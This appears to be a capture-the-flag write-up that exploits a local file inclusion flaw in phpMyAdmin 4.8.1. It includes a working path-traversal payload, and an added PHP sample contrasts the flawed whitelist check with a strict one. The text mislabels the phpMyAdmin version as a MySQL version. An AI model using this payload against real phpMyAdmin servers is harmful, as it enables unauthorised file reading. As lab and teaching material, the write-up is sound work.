
BUUCTF [GWCTF 2019] I have a database (Xiaoyute detailed explanation)

2022-07-06 06:00:00 Xiaoyute detailed explanation


I don't know why the display is garbled here.

Scan the website directly with dirsearch.

The scan finds the phpmyadmin directory, and logging in without a password succeeds.

The version number is given here: MySQL database version 4.8.1.

This version contains a file inclusion vulnerability.

The principle of the vulnerability is as follows:

The / placed after db_datadict.php? makes db_datadict.php? be treated as a nonexistent directory, and the include function then keeps jumping up directories through the ../ sequences to try to reach flag.

payload

phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag
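
The mismatch described above, between what is validated and what is passed to include, shown as an added example. It is a simplified model and not phpMyAdmin's own code or code from the original post. The whitelist entries, the function names and the install path /var/www/html/phpmyadmin are assumptions made for illustration.

```php
<?php
// Added example: simplified model of a "text before ?" whitelist check.
// Constructed sample whitelist (assumption, not the real list).
const WHITELIST = ['db_datadict.php', 'db_sql.php', 'server_status.php'];

// Flawed check: approves the target when the text before the first '?'
// is whitelisted, although the caller later includes the WHOLE string.
function check_flawed(string $target): bool
{
    if (in_array($target, WHITELIST, true)) {
        return true;
    }
    $head = explode('?', $target, 2)[0];
    return in_array($head, WHITELIST, true);
}

// One hardened form: the exact value that will be included must itself
// be a whitelist entry, so nothing can ride along after a '?'.
function check_strict(string $target): bool
{
    return in_array($target, WHITELIST, true);
}

// Textual collapse of '.' and '..' segments, standing in for how the
// include path is resolved; 'db_datadict.php?' is just one more segment
// that a following '..' cancels, so it never has to exist on disk.
function collapse(string $base, string $target): string
{
    $parts = [];
    foreach (explode('/', $base . '/' . $target) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($parts);
            continue;
        }
        $parts[] = $seg;
    }
    return '/' . implode('/', $parts);
}

$base = '/var/www/html/phpmyadmin'; // assumed install path
foreach (['db_datadict.php', 'db_datadict.php?/../../../../../flag'] as $t) {
    printf("%-40s flawed=%s strict=%s resolves=%s\n", $t,
        var_export(check_flawed($t), true),
        var_export(check_strict($t), true),
        collapse($base, $t));
}
```

The flawed check approves both targets while the strict check approves only the plain file name, which is the property a fix has to restore: validate the same string that is handed to include.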
